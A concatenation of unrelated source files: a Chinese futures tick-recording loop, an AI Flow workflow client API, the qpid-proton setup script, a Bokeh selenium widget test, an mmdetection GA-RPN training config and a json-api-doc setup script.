单symbol_dict映射={ x.split('.')[1]:x for x in 需要订阅的CTPsymbol}
while True:
try:
symbol,UpdateTime, UpdateMillisec, TradingDay,ActionDay,LastPrice, Volume, AskPrice1,AskVolume1, BidPrice1,BidVolume1,OpenInterest,\
PreSettlementPrice,PreClosePrice, PreOpenInterest,OpenPrice,HighestPrice,LowestPrice,Turnover,ClosePrice,SettlementPrice,UpperLimitPrice,LowerLimitPrice,BidPrice2,BidVolume2,AskPrice2,AskVolume2,\
BidPrice3,BidVolume3,AskPrice3,AskVolume3,BidPrice4,BidVolume4,AskPrice4,AskVolume4,BidPrice5,BidVolume5,AskPrice5,AskVolume5,AveragePrice=存储tick队列.get(timeout=30)
            except queue.Empty:
当前时间=time_to_str(time.time())[11:16]
if 当前时间>"20:30" or "00:00"<=当前时间<"02:30" or "08:30"<当前时间<"15:30":
continue
else:
time.sleep(1)
mduserapi.Release()
print("哥哥我释放了")
break
# if time_to_str(time.time())[11:13] in ("16","03") or time_to_str(time.time())[11:16]=="10:11" :
# mduserapi.Release()
# print("哥哥我释放了2")
# # for x in range(1000):
# # print(x)
# # time.sleep(1)
# break
if 行情类型=="TQ":
#print(symbol)
                # process this tick
if 当前交易日<TradingDay:
当前交易日=TradingDay
天勤.updata(单symbol_dict映射[symbol],UpdateTime, UpdateMillisec, 当前交易日,ActionDay,LastPrice, Volume, AskPrice1,AskVolume1, BidPrice1,BidVolume1,OpenInterest,PreSettlementPrice,PreClosePrice, PreOpenInterest,OpenPrice,HighestPrice,LowestPrice,Turnover,ClosePrice,SettlementPrice,UpperLimitPrice,LowerLimitPrice,BidPrice2,BidVolume2,AskPrice2,AskVolume2,BidPrice3,BidVolume3,AskPrice3,AskVolume3,BidPrice4,BidVolume4,AskPrice4,AskVolume4,BidPrice5,BidVolume5,AskPrice5,AskVolume5,AveragePrice)
                # handle the continuous (main) contract
if 单symbol_dict映射[symbol] in 订阅中的主连合约_反向:
天勤.updata(订阅中的主连合约_反向[单symbol_dict映射[symbol]],UpdateTime, UpdateMillisec, TradingDay,ActionDay,LastPrice, Volume, AskPrice1,AskVolume1, BidPrice1,BidVolume1,OpenInterest,PreSettlementPrice,PreClosePrice, PreOpenInterest,OpenPrice,HighestPrice,LowestPrice,Turnover,ClosePrice,SettlementPrice,UpperLimitPrice,LowerLimitPrice,BidPrice2,BidVolume2,AskPrice2,AskVolume2,BidPrice3,BidVolume3,AskPrice3,AskVolume3,BidPrice4,BidVolume4,AskPrice4,AskVolume4,BidPrice5,BidVolume5,AskPrice5,AskVolume5,AveragePrice)
                # if the queue is empty after processing this tick, refresh the index contracts (change_i_data)
if 存储tick队列.empty():
time.sleep(0.003)
if 存储tick队列.empty():
#print(time_to_str(time.time()))
天勤.change_i_data(订阅中的指数合约)
                        # after processing everything, push all updates
天勤.all_push()
print(time_to_str(time.time()),"完成本轮推送")
else:
#print("我错了")
pass
while True:
当前时间=time_to_str(time.time())[11:16]
if 当前时间>"20:30" or "00:00"<=当前时间<"02:30" or "08:30"<当前时间<"15:30":
break
else:
time.sleep(1)
def 启动行情记录(symbol_list,list_duration_seconds,行情类型="TQ",redis_con=None,天勤连接=None,通达信连接=None,data_length=2000,行情地址="tcp://101.230.209.178:53313",md_subscription_name="gaoctp"):
while True:
当前时间=time_to_str(time.time())[11:16]
if 当前时间>"20:30" or "00:00"<当前时间<"02:30" or "08:30"<当前时间<"15:30":
启动行情记录2(symbol_list,list_duration_seconds,行情类型,redis_con,天勤连接,通达信连接,data_length,行情地址,md_subscription_name)
time.sleep(1)
|
the-stack_0_25965
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import time
import sys
import os
from typing import Text, List, Dict
from ai_flow.project.blob_manager import BlobManagerFactory
from ai_flow.util import json_utils
from ai_flow.graph.graph import default_graph
from ai_flow.translator.base_translator import get_default_translator
from ai_flow.client.ai_flow_client import get_ai_flow_client
from ai_flow.api.configuration import project_config, project_description
from ai_flow.workflow.workflow import JobInfo, WorkflowExecutionInfo, WorkflowInfo, Workflow
from ai_flow.rest_endpoint.service.workflow_proto_utils import \
proto_to_workflow, proto_to_workflow_list, proto_to_workflow_execution, proto_to_workflow_execution_list,\
proto_to_job, proto_to_job_list
def _upload_project_package(workflow: Workflow):
"""
Upload the project package.
:param workflow: The generated workflow.
"""
project_desc = project_description()
workflow_json_file = os.path.join(project_desc.get_absolute_temp_path(),
project_desc.project_config.get_project_uuid() + "_workflow.json")
with open(workflow_json_file, 'w') as f:
f.write(json_utils.dumps(workflow))
blob_manager = BlobManagerFactory.get_blob_manager(project_desc.project_config['blob'])
uploaded_project_path = blob_manager.upload_blob(str(workflow.workflow_id), project_desc.project_path)
project_desc.project_config.set_uploaded_project_path(uploaded_project_path)
for job in workflow.jobs.values():
job.job_config.project_path = uploaded_project_path
def _register_job_meta(workflow_id: int, job):
start_time = time.time()
if job.job_config.job_name is None:
name = job.instance_id
else:
name = job.job_config.job_name
job_name = str(workflow_id) + '_' + name[0:20] + '_' + str(start_time)
job.job_name = job_name
def _set_entry_module_path(workflow: Workflow, entry_module_path: Text):
"""
Set entry model path.
:param workflow: The generated workflow.
"""
for job in workflow.jobs.values():
job.job_config.properties['entry_module_path'] = entry_module_path
def submit_workflow(workflow_name: Text = None,
args: Dict = None) -> WorkflowInfo:
"""
Submit the ai flow workflow to the scheduler.
    :param workflow_name: The ai flow workflow identifier.
:param args: The arguments of the submit action.
:return: The result of the submit action.
"""
call_path = os.path.abspath(sys._getframe(1).f_code.co_filename)
project_path = os.path.abspath(project_description().project_path)
# length /python_codes/ is 14; length .py is 3
entry_module_path = call_path[len(project_path)+14:-3].replace('/', '.')
namespace = project_config().get_project_name()
translator = get_default_translator()
workflow = translator.translate(graph=default_graph(), project_desc=project_description())
for job in workflow.jobs.values():
_register_job_meta(workflow_id=workflow.workflow_id, job=job)
_set_entry_module_path(workflow, entry_module_path)
_upload_project_package(workflow)
return proto_to_workflow(get_ai_flow_client()
.submit_workflow_to_scheduler(namespace=namespace,
workflow_json=json_utils.dumps(workflow),
workflow_name=workflow_name,
args=args))
def delete_workflow(workflow_name: Text = None) -> WorkflowInfo:
"""
Delete the ai flow workflow from the scheduler.
    :param workflow_name: The ai flow workflow identifier.
:return: The result of the action.
"""
namespace = project_config().get_project_name()
return proto_to_workflow(get_ai_flow_client().delete_workflow(namespace, workflow_name))
def pause_workflow_scheduling(workflow_name: Text = None) -> WorkflowInfo:
"""
Pause the ai flow workflow from the scheduler.
    :param workflow_name: The ai flow workflow identifier.
:return: The result of the action.
"""
namespace = project_config().get_project_name()
return proto_to_workflow(get_ai_flow_client().pause_workflow_scheduling(namespace, workflow_name))
def resume_workflow_scheduling(workflow_name: Text = None) -> WorkflowInfo:
"""
Resume the ai flow workflow from the scheduler.
    :param workflow_name: The ai flow workflow identifier.
:return: The result of the action.
"""
namespace = project_config().get_project_name()
return proto_to_workflow(get_ai_flow_client().resume_workflow_scheduling(namespace, workflow_name))
def get_workflow(workflow_name: Text = None) -> WorkflowInfo:
"""
Return the workflow information.
    :param workflow_name: The ai flow workflow identifier.
:return: the workflow information.
"""
namespace = project_config().get_project_name()
return proto_to_workflow(get_ai_flow_client().get_workflow(namespace, workflow_name))
def list_workflows() -> List[WorkflowInfo]:
"""
:return: All workflow information.
"""
namespace = project_config().get_project_name()
return proto_to_workflow_list(get_ai_flow_client().list_workflows(namespace))
def start_new_workflow_execution(workflow_name: Text) -> WorkflowExecutionInfo:
"""
Run the project under the current project path.
    :param workflow_name: The ai flow workflow identifier.
:return: The result of the run action.
"""
namespace = project_config().get_project_name()
return proto_to_workflow_execution(get_ai_flow_client().start_new_workflow_execution(namespace, workflow_name))
def kill_all_workflow_executions(workflow_name: Text) -> List[WorkflowExecutionInfo]:
"""
Stop all instances of the workflow.
    :param workflow_name: The ai flow workflow identifier.
:return: The result of the action.
"""
namespace = project_config().get_project_name()
return proto_to_workflow_execution_list(get_ai_flow_client().kill_all_workflow_executions(namespace, workflow_name))
def kill_workflow_execution(execution_id: Text) -> WorkflowExecutionInfo:
"""
Stop the instance of the workflow.
    :param execution_id: The ai flow workflow execution identifier.
:return: The result of the action.
"""
return proto_to_workflow_execution(get_ai_flow_client().kill_workflow_execution(execution_id))
def get_workflow_execution(execution_id: Text) -> WorkflowExecutionInfo:
"""
Get the WorkflowExecutionInfo from scheduler.
:param execution_id:
:return: WorkflowExecutionInfo
"""
return proto_to_workflow_execution(get_ai_flow_client().get_workflow_execution(execution_id))
def list_workflow_executions(workflow_name: Text) -> List[WorkflowExecutionInfo]:
"""
    :param workflow_name: The ai flow workflow identifier.
:return: All workflow executions of the workflow.
"""
namespace = project_config().get_project_name()
return proto_to_workflow_execution_list(get_ai_flow_client().list_workflow_executions(namespace, workflow_name))
def start_job(job_name: Text,
execution_id: Text) -> JobInfo:
"""
Start a job defined in the ai flow workflow.
    :param job_name: The name of the job defined in the workflow.
    :param execution_id: The ai flow workflow execution identifier.
:return: The result of the action.
"""
return proto_to_job(get_ai_flow_client().start_job(job_name, execution_id))
def stop_job(job_name: Text,
execution_id: Text) -> JobInfo:
"""
Stop a job defined in the ai flow workflow.
    :param job_name: The name of the job defined in the workflow.
    :param execution_id: The ai flow workflow execution identifier.
:return: The result of the action.
"""
return proto_to_job(get_ai_flow_client().stop_job(job_name, execution_id))
def restart_job(job_name: Text,
execution_id: Text) -> JobInfo:
"""
    Restart a job defined in the ai flow workflow.
    :param job_name: The name of the job defined in the workflow.
    :param execution_id: The ai flow workflow execution identifier.
:return: The result of the action.
"""
return proto_to_job(get_ai_flow_client().restart_job(job_name, execution_id))
def get_job(job_name: Text,
execution_id: Text) -> JobInfo:
"""
Get job information by job name.
:param job_name:
:param execution_id:
:return:
"""
return proto_to_job(get_ai_flow_client().get_job(job_name, execution_id))
def list_jobs(execution_id: Text) -> List[JobInfo]:
"""
List the jobs of the workflow execution.
:param execution_id:
:return:
"""
return proto_to_job_list(get_ai_flow_client().list_jobs(execution_id))
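# Illustrative sketch (an assumption, not part of the original module): submits
# the workflow built from the current project and starts one execution, using
# only functions defined above. The workflow name is a placeholder; in practice
# this would be called from a script inside the project's python_codes folder.
def _example_submit_and_run(workflow_name: Text = 'example_workflow'):
    workflow_info = submit_workflow(workflow_name=workflow_name)
    execution_info = start_new_workflow_execution(workflow_name)
    return workflow_info, execution_info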
|
the-stack_0_25966
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
python-qpid-proton setup script
DISCLAIMER: This script took a lot of inspiration from PyZMQ, which is licensed
under the 'MODIFIED BSD LICENSE'.
Although inspired by the work in PyZMQ, this script and the modules it depends
on were largely simplified to meet the requirements of the library.
The default behavior of this script is to build the registered `_cproton`
extension using the system qpid-proton library. However, before doing that, the
script will try to discover the available qpid-proton's version and whether it's
suitable for the version of this library. This allows us to have a tight release
between the versions of the bindings and qpid-proton's version.
The versions used to verify this are in `setuputils.bundle` and they should be
increased on every release. Note that `bundled_version` matches the current
released version. The motivation behind this is that we don't know how many
new releases will be made in the `0.9` series, therefore we need to target the
latest possible.
If qpid-proton is found in the system and the available versions match the
required ones, then the install process will continue normally.
If the available versions are not good for the bindings or the library is
missing, then the following will happen:
The setup script will attempt to download the C source for qpid-proton - see
`setuputils.bundle.fetch_libqpid_proton` - and it will include the proton C
code into the extension itself.
While the above removes the need to *always* have qpid-proton installed, it
does not remove the need to have `swig` and the libraries qpid-proton requires
installed to make this setup work.
From the Python side, this script overrides one command - build_ext - and adds a
new one. The latter - Configure - is called from the former to set up/discover what's
in the system. The rest of the commands and steps are run normally without any kind
of monkey patching.
"""
import glob
import os
import subprocess
import sys
import distutils.spawn as ds_spawn
import distutils.sysconfig as ds_sys
from distutils.ccompiler import new_compiler, get_default_compiler
from distutils.core import setup, Extension
from distutils.command.build import build
from distutils.command.build_ext import build_ext
from distutils.command.sdist import sdist
from distutils import errors
from setuputils import bundle
from setuputils import log
from setuputils import misc
class CheckSDist(sdist):
def run(self):
self.distribution.run_command('configure')
# Append the source that was removed during
# the configuration step.
_cproton = self.distribution.ext_modules[-1]
_cproton.sources.append('cproton.i')
try:
sdist.run(self)
finally:
for src in ['cproton.py', 'cproton_wrap.c']:
if os.path.exists(src):
os.remove(src)
class Configure(build_ext):
description = "Discover Qpid Proton version"
@property
def compiler_type(self):
compiler = self.compiler
if compiler is None:
return get_default_compiler()
elif isinstance(compiler, str):
return compiler
else:
return compiler.compiler_type
def prepare_swig_wrap(self):
"""Run swig against the sources. This will cause swig to compile the
cproton.i file into a .c file called cproton_wrap.c, and create
cproton.py.
"""
ext = self.distribution.ext_modules[-1]
if 'SWIG' in os.environ:
self.swig = os.environ['SWIG']
try:
# This will actually call swig to generate the files
# and list the sources.
self.swig_sources(ext.sources, ext)
except (errors.DistutilsExecError, errors.DistutilsPlatformError) as e:
if not (os.path.exists('cproton_wrap.c') or
os.path.exists('cproton.py')):
raise e
# now remove the cproton.i file from the source list so we don't run
# swig again.
ext.sources = ext.sources[1:]
ext.swig_opts = []
def bundle_libqpid_proton_extension(self):
"""The proper version of libqpid-proton is not present on the system,
so attempt to retrieve the proper libqpid-proton sources and
include them in the extension.
"""
setup_path = os.path.dirname(os.path.realpath(__file__))
base = self.get_finalized_command('build').build_base
build_include = os.path.join(base, 'include')
log.info("Bundling qpid-proton into the extension")
# QPID_PROTON_SRC - (optional) pathname to the Proton C sources. Can
# be used to override where this setup gets the Proton C sources from
# (see bundle.fetch_libqpid_proton())
if 'QPID_PROTON_SRC' not in os.environ:
if not os.path.exists(os.path.join(setup_path, 'CMakeLists.txt')):
bundledir = os.path.join(base, "bundled")
if not os.path.exists(bundledir):
os.makedirs(bundledir)
bundle.fetch_libqpid_proton(bundledir)
libqpid_proton_dir = os.path.abspath(os.path.join(bundledir, 'qpid-proton'))
else:
# setup.py is being invoked from within the proton source tree
# (CMakeLists.txt is not present in the python source dist).
# In this case build using the local sources. This use case is
# specifically for developers working on the proton source
# code.
proton_c = os.path.join(setup_path, '..', '..', '..')
libqpid_proton_dir = os.path.abspath(proton_c)
else:
libqpid_proton_dir = os.path.abspath(os.environ['QPID_PROTON_SRC'])
log.debug("Using libqpid-proton src: %s" % libqpid_proton_dir)
proton_base = os.path.join(libqpid_proton_dir, 'proton-c')
proton_src = os.path.join(proton_base, 'src')
proton_include = os.path.join(proton_base, 'include')
#
# Create any generated header files, and put them in build_include:
#
if not os.path.exists(build_include):
os.makedirs(build_include)
os.mkdir(os.path.join(build_include, 'proton'))
# Create copy of environment variables and modify PYTHONPATH to preserve
# all others environment variables defined by user. When `env` is specified
# Popen will not inherit environment variables of the current process.
proton_envs = os.environ.copy()
default_path = proton_envs.get('PYTHONPATH')
proton_envs['PYTHONPATH'] = proton_base if not default_path else '{0}{1}{2}'.format(
proton_base, os.pathsep, default_path)
# Generate `protocol.h` by calling the python
# script found in the source dir.
with open(os.path.join(build_include, 'protocol.h'), 'wb') as header:
subprocess.Popen([sys.executable, os.path.join(proton_src, 'protocol.h.py')],
env=proton_envs, stdout=header)
# Generate `encodings.h` by calling the python
# script found in the source dir.
with open(os.path.join(build_include, 'encodings.h'), 'wb') as header:
subprocess.Popen([sys.executable,
os.path.join(proton_src, 'codec', 'encodings.h.py')],
env=proton_envs, stdout=header)
# Create a custom, temporary, version.h file mapping the
# major and minor versions from the downloaded tarball. This version should
# match the ones in the bundle module
with open(os.path.join(build_include, 'proton', 'version.h'), "wb") as ver:
version_text = """
#ifndef _PROTON_VERSION_H
#define _PROTON_VERSION_H 1
#define PN_VERSION_MAJOR %i
#define PN_VERSION_MINOR %i
#define PN_VERSION_POINT %i
#endif /* version.h */
""" % bundle.bundled_version
ver.write(version_text.encode('utf-8'))
# Collect all the Proton C files that need to be built.
# we could've used `glob(.., '*', '*.c')` but I preferred going
# with an explicit list of subdirs that we can control and expand
# depending on the version. Specifically, lets avoid adding things
# we don't need.
sources = []
for subdir in ['object', 'framing', 'codec', 'dispatcher',
'engine', 'events', 'transport',
'message', 'reactor', 'messenger',
'handlers', 'posix']:
sources.extend(glob.glob(os.path.join(proton_src, subdir, '*.c')))
sources.extend(filter(lambda x: not x.endswith('dump.c'),
glob.iglob(os.path.join(proton_src, '*.c'))))
# Look for any optional libraries that proton needs, and adjust the
# source list and compile flags as necessary.
libraries = []
# -D flags (None means no value, just define)
macros=[('qpid_proton_EXPORTS', None),
('USE_ATOLL', None),
('USE_STRERROR_R', None)]
# Check whether openssl is installed by poking
# pkg-config for a minimum version 0. If it's installed, it should
# return True and we'll use it. Otherwise, we'll use the stub.
if misc.pkg_config_version(atleast='0', module='openssl'):
libraries += ['ssl', 'crypto']
sources.append(os.path.join(proton_src, 'ssl', 'openssl.c'))
else:
sources.append(os.path.join(proton_src, 'ssl', 'ssl_stub.c'))
# create a temp compiler to check for optional compile-time features
cc = new_compiler(compiler=self.compiler_type)
cc.output_dir = self.build_temp
# Some systems need to link to `rt`. Check whether `clock_gettime` is
# around and if librt is needed
if cc.has_function('clock_gettime'):
macros.append(('USE_CLOCK_GETTIME', None))
else:
if cc.has_function('clock_gettime', libraries=['rt']):
libraries.append('rt')
macros.append(('USE_CLOCK_GETTIME', None))
# 0.10 added an implementation for cyrus. Check
# if it is available before adding the implementation to the sources
# list. Eventually, `sasl.c` will be added and one of the existing
# implementations will be used.
if cc.has_function('sasl_client_done', includes=['sasl/sasl.h'],
libraries=['sasl2']):
libraries.append('sasl2')
sources.append(os.path.join(proton_src, 'sasl', 'cyrus_sasl.c'))
else:
sources.append(os.path.join(proton_src, 'sasl', 'none_sasl.c'))
sources.append(os.path.join(proton_src, 'sasl', 'sasl.c'))
# compile all the proton sources. We'll add the resulting list of
# objects to the _cproton extension as 'extra objects'. We do this
# instead of just lumping all the sources into the extension to prevent
# any proton-specific compilation flags from affecting the compilation
# of the generated swig code
cc = new_compiler(compiler=self.compiler_type)
ds_sys.customize_compiler(cc)
objects = cc.compile(sources,
macros=macros,
include_dirs=[build_include,
proton_include,
proton_src],
# compiler command line options:
extra_postargs=['-std=gnu99'],
output_dir=self.build_temp)
#
# Now update the _cproton extension instance to include the objects and
# libraries
#
_cproton = self.distribution.ext_modules[-1]
_cproton.extra_objects = objects
_cproton.include_dirs.append(build_include)
_cproton.include_dirs.append(proton_include)
# swig will need to access the proton headers:
_cproton.swig_opts.append('-I%s' % build_include)
_cproton.swig_opts.append('-I%s' % proton_include)
# lastly replace the libqpid-proton dependency with libraries required
# by the Proton objects:
_cproton.libraries=libraries
def check_qpid_proton_version(self):
"""check the qpid_proton version"""
target_version = bundle.bundled_version_str
return (misc.pkg_config_version(max_version=target_version) and
misc.pkg_config_version(atleast=bundle.min_qpid_proton_str))
@property
def bundle_proton(self):
"""Need to bundle proton if the conditions below are met."""
return ('QPID_PROTON_SRC' in os.environ) or \
(not self.check_qpid_proton_version())
def use_installed_proton(self):
"""The Proton development headers and library are installed, update the
_cproton extension to tell it where to find the library and headers.
"""
_cproton = self.distribution.ext_modules[-1]
incs = misc.pkg_config_get_var('includedir')
for i in incs.split():
_cproton.swig_opts.append('-I%s' % i)
_cproton.include_dirs.append(i)
ldirs = misc.pkg_config_get_var('libdir')
_cproton.library_dirs.extend(ldirs.split())
def run(self):
# check if the Proton library and headers are installed and are
# compatible with this version of the binding.
if self.bundle_proton:
# Proton not installed or compatible
self.bundle_libqpid_proton_extension()
else:
self.use_installed_proton()
self.prepare_swig_wrap()
class CustomBuildOrder(build):
# The sole purpose of this class is to re-order
# the commands execution so that `build_ext` is executed *before*
# build_py. We need this to make sure `cproton.py` is generated
# before the python modules are collected. Otherwise, it won't
# be installed.
sub_commands = [
('build_ext', build.has_ext_modules),
('build_py', build.has_pure_modules),
('build_clib', build.has_c_libraries),
('build_scripts', build.has_scripts),
]
class CheckingBuildExt(build_ext):
"""Subclass build_ext to build qpid-proton using `cmake`"""
def run(self):
# Discover qpid-proton in the system
self.distribution.run_command('configure')
build_ext.run(self)
# Override `build_ext` and add `configure`
cmdclass = {'configure': Configure,
'build': CustomBuildOrder,
'build_ext': CheckingBuildExt,
'sdist': CheckSDist}
setup(name='python-qpid-proton',
version=bundle.bundled_version_str,
description='An AMQP based messaging library.',
author='Apache Qpid',
author_email='[email protected]',
url='http://qpid.apache.org/proton/',
packages=['proton'],
py_modules=['cproton'],
license="Apache Software License",
classifiers=["License :: OSI Approved :: Apache Software License",
"Intended Audience :: Developers",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5"],
cmdclass=cmdclass,
# Note well: the following extension instance is modified during the
# installation! If you make changes below, you may need to update the
# Configure class above
ext_modules=[Extension('_cproton',
sources=['cproton.i', 'cproton_wrap.c'],
swig_opts=['-threads'],
extra_compile_args=['-pthread'],
libraries=['qpid-proton'])])
|
the-stack_0_25967
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2017, Anaconda, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Bokeh imports
from bokeh._testing.util.selenium import RECORD
from bokeh.layouts import column
from bokeh.models import (
CheckboxButtonGroup,
Circle,
ColumnDataSource,
CustomAction,
CustomJS,
Plot,
Range1d,
)
#-----------------------------------------------------------------------------
# Tests
#-----------------------------------------------------------------------------
pytest_plugins = (
"bokeh._testing.plugins.project",
)
LABELS = ["Option 1", "Option 2", "Option 3"]
@pytest.mark.integration
@pytest.mark.selenium
class Test_CheckboxButtonGroup(object):
def test_server_on_change_round_trip(self, bokeh_server_page):
def modify_doc(doc):
source = ColumnDataSource(dict(x=[1, 2], y=[1, 1], val=["a", "b"]))
plot = Plot(plot_height=400, plot_width=400, x_range=Range1d(0, 1), y_range=Range1d(0, 1), min_border=0)
plot.add_glyph(source, Circle(x='x', y='y', size=20))
plot.add_tools(CustomAction(callback=CustomJS(args=dict(s=source), code=RECORD("data", "s.data"))))
group = CheckboxButtonGroup(labels=LABELS, css_classes=["foo"])
def cb(active):
source.data['val'] = (active + [0, 0])[:2] # keep col length at 2, padded with zero
group.on_click(cb)
doc.add_root(column(group, plot))
page = bokeh_server_page(modify_doc)
el = page.driver.find_element_by_css_selector('.foo .bk-btn:nth-child(3)')
el.click()
page.click_custom_action()
results = page.results
assert results['data']['val'] == [2, 0]
el = page.driver.find_element_by_css_selector('.foo .bk-btn:nth-child(1)')
el.click()
page.click_custom_action()
results = page.results
assert results['data']['val'] == [0, 2]
# XXX (bev) disabled until https://github.com/bokeh/bokeh/issues/7970 is resolved
#assert page.has_no_console_errors()
def test_js_on_change_executes(self, bokeh_model_page):
group = CheckboxButtonGroup(labels=LABELS, css_classes=["foo"])
group.js_on_click(CustomJS(code=RECORD("active", "cb_obj.active")))
page = bokeh_model_page(group)
el = page.driver.find_element_by_css_selector('.foo .bk-btn:nth-child(3)')
el.click()
results = page.results
assert results['active'] == [2]
el = page.driver.find_element_by_css_selector('.foo .bk-btn:nth-child(1)')
el.click()
results = page.results
assert results['active'] == [0, 2]
el = page.driver.find_element_by_css_selector('.foo .bk-btn:nth-child(3)')
el.click()
results = page.results
assert results['active'] == [0]
assert page.has_no_console_errors()
|
the-stack_0_25969
|
# model settings
model = dict(
type='RPN',
pretrained='open-mmlab://resnet50_caffe',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=False),
norm_eval=True,
style='caffe'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='GARPNHead',
in_channels=256,
feat_channels=256,
octave_base_scale=8,
scales_per_octave=3,
octave_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
anchor_base_sizes=None,
anchoring_means=[.0, .0, .0, .0],
anchoring_stds=[0.07, 0.07, 0.14, 0.14],
target_means=(.0, .0, .0, .0),
target_stds=[0.07, 0.07, 0.11, 0.11],
loc_filter_thr=0.01,
loss_loc=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_shape=dict(type='BoundedIoULoss', beta=0.2, loss_weight=1.0),
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)))
# model training and testing settings
train_cfg = dict(
rpn=dict(
ga_assigner=dict(
type='ApproxMaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
ga_sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=-1,
pos_weight=-1,
center_ratio=0.2,
ignore_ratio=0.5,
debug=False))
test_cfg = dict(
rpn=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0))
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[102.9801, 115.9465, 122.7717], std=[1.0, 1.0, 1.0], to_rgb=False)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True, with_label=False),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='proposal_fast')
# optimizer
optimizer = dict(type='SGD', lr=0.02, momentum=0.9, weight_decay=0.0001)
# runner configs
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=20)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 300
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/ga_rpn_r50_caffe_fpn_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
|
the-stack_0_25970
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
from setuptools import setup, find_packages
with open('README.rst') as readme_file:
readme = readme_file.read()
requirements = []
setup_requirements = ['pytest-runner', ]
test_requirements = ['pytest', ]
setup(
author="Julien Duponchelle",
author_email='[email protected]',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Natural Language :: English',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
description="JSON API to document parser",
install_requires=requirements,
license="Apache Software License 2.0",
long_description=readme,
include_package_data=True,
keywords='json api',
name='json-api-doc',
packages=find_packages(include=['json_api_doc']),
setup_requires=setup_requirements,
test_suite='tests',
tests_require=test_requirements,
url='https://github.com/noplay/json-api-doc',
version='0.9.0',
entry_points={
'console_scripts': ['jsonapidoc = json_api_doc.__main__:main'],
}
)
|
the-stack_0_25972
|
import os
import torch
import datetime
